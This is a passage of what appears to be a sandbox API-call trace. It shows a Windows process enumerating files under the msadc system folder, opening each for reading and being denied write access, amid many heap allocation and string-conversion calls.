hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0088.522] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.522] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.522] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41dce0ea, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41dce0ea, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41dce0ea, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x26f, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="adcvbs.inc", cAlternateFileName="")) returned 1 [0088.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0088.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0088.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0088.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0088.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0088.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0088.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0088.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8aeb0 [0088.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0088.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0088.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0088.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0088.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.523] AreFileApisANSI () returned 1 [0088.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc", lpUsedDefaultChar=0x0) returned 54 [0088.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0088.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0088.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0088.524] AreFileApisANSI () returned 1 [0088.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0088.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76098 [0088.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x76098, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 54 [0088.524] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.524] GetFileType (hFile=0x348) returned 0x1 [0088.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0088.524] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.524] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.525] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.525] CloseHandle (hObject=0x348) returned 1 [0088.525] AreFileApisANSI () returned 1 [0088.525] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0088.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76110 [0088.525] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x76110, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 54 [0088.525] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.525] GetLastError () returned 0x5 [0088.525] GetLastError () returned 0x5 [0088.525] SetLastError (dwErrCode=0x5) [0088.525] GetLastError () returned 0x5 [0088.525] SetLastError (dwErrCode=0x5) [0088.525] GetLastError () returned 0x5 [0088.525] SetLastError (dwErrCode=0x5) [0088.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0088.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0088.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0088.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.526] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0d805e9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="en-US", cAlternateFileName="")) returned 1 [0088.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0088.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0088.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0088.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0088.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0088.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0088.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0088.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a8c0 [0088.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0088.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0088.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0088.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0088.526] AreFileApisANSI () returned 1 [0088.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US", lpUsedDefaultChar=0x0) returned 49 [0088.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0088.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0088.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0088.526] AreFileApisANSI () returned 1 [0088.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0088.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x460b8 [0088.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x460b8, cchWideChar=49 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US") returned 49 [0088.527] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.527] GetLastError () returned 0x5 [0088.527] GetLastError () returned 0x5 [0088.527] SetLastError (dwErrCode=0x5) [0088.527] GetLastError () returned 0x5 [0088.527] SetLastError (dwErrCode=0x5) [0088.527] GetLastError () returned 0x5 [0088.527] SetLastError (dwErrCode=0x5) [0088.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0088.527] AreFileApisANSI () returned 1 [0088.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0088.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x46a58 [0088.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x46a58, cchWideChar=49 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US") returned 49 [0088.527] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.527] GetLastError () returned 0x5 [0088.527] GetLastError () returned 0x5 [0088.527] SetLastError (dwErrCode=0x5) [0088.527] GetLastError () returned 0x5 [0088.527] SetLastError (dwErrCode=0x5) [0088.527] GetLastError () returned 0x5 [0088.527] SetLastError (dwErrCode=0x5) [0088.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0088.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0088.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0088.528] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.528] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.528] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.528] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0088.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8aeb0 [0088.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0088.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0088.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0088.528] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41da7e83, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41da7e83, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41da7e83, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa9c00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msadce.dll", cAlternateFileName="")) returned 1 [0088.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0088.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0088.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0088.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0088.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0088.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0088.528] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x77f90 [0088.528] FindNextFileW (in: hFindFile=0x77f90, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0d805e9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.528] FindNextFileW (in: hFindFile=0x77f90, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b99489e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb198bf00, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadcer.dll.mui", cAlternateFileName="")) returned 1 [0088.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0088.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0088.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0088.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0088.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46898 [0088.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0088.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0088.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0088.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0088.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0088.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0088.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0088.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0088.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0088.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0088.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fbb8 [0088.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0088.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0088.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0088.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fbb8 | out: hHeap=0x20000) returned 1 [0088.529] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.529] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.529] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.529] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0088.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.530] AreFileApisANSI () returned 1 [0088.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui", lpUsedDefaultChar=0x0) returned 65 [0088.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0088.530] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.530] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0088.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0088.530] AreFileApisANSI () returned 1 [0088.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0088.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x81fc8 [0088.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x81fc8, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui") returned 65 [0088.530] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcer.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0088.531] GetFileType (hFile=0x368) returned 0x1 [0088.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81fc8 | out: hHeap=0x20000) returned 1 [0088.531] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.531] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.532] SetFilePointerEx 